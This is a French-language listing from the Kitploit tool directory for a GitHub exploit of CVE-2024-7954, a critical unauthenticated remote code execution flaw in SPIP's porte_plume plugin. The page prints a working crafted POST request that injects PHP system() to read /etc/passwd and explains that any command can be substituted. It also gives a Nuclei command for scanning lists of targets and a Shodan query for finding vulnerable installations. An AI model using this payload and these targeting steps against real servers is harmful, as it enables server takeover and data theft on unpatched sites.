Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RCE-CVE-2024-7954 — Exploit pour CVE-2024-7954, une RCE critique dans le plugin porte_plume de SPIP, avec une requête HTTP conçue et un modèle Nuclei pour l'analyse automatisée. | Kitploit
Outils/GitHubGitHub/arthikw3b/rce-cve-2024-7954
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Exploit pour CVE-2024-7954, une RCE critique dans le plugin porte_plume de SPIP, avec une requête HTTP conçue et un modèle Nuclei pour l'analyse automatisée.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE-CVE-2024-7954

Description

Le plugin porte_plume, utilisé par les versions de SPIP antérieures à 4.30-alpha2, 4.2.13 et 4.1.16, est vulnérable à une exécution de code arbitraire (RCE) critique. Cette faille permet à un attaquant distant non authentifié d'exécuter du code PHP arbitraire en tant qu'utilisateur SPIP en forgeant une requête HTTP spécifique. Le potentiel d'exploitation est grave, permettant à des attaquants d'exécuter des commandes malveillantes sur le serveur, ce qui pourrait entraîner un accès non autorisé, des violations de données ou une compromission ultérieure du système.

Détails de la vulnérabilité

  • Logiciel affecté : SPIP (antérieur aux versions 4.30-alpha2, 4.2.13 et 4.1.16)
  • Type de vulnérabilité : Exécution de code à distance (RCE)
  • Niveau de gravité : Critique
  • Exploitabilité : Les attaquants distants non authentifiés peuvent exploiter cette vulnérabilité.

Exploit

##Nuclei Analyse

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml

Un exemple de requête HTTP forgée pouvant être utilisée pour exploiter cette vulnérabilité est le suivant :

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Explication de l'exploit :

  • La requête POST est dirigée vers l'action porte_plume_previsu du fichier index.php de SPIP.
  • Le paramètre data contient une charge utile qui exploite la fonction system() de PHP pour exécuter une commande (dans ce cas, cat /etc/passwd), ce qui lit le contenu du fichier de mots de passe.
  • En modifiant la commande dans la fonction system(), un attaquant pourrait exécuter n'importe quel code PHP sur le serveur, entraînant des conséquences graves.

Shodan Dork

Pour identifier les installations SPIP potentiellement vulnérables, la requête Shodan suivante peut être utilisée :

root@kitploit:~
app="SPIP"

Cette vulnérabilité souligne l'importance de maintenir les logiciels à jour et de mettre en œuvre des mesures de sécurité robustes pour se protéger contre l'exploitation.

Télécharger l’outil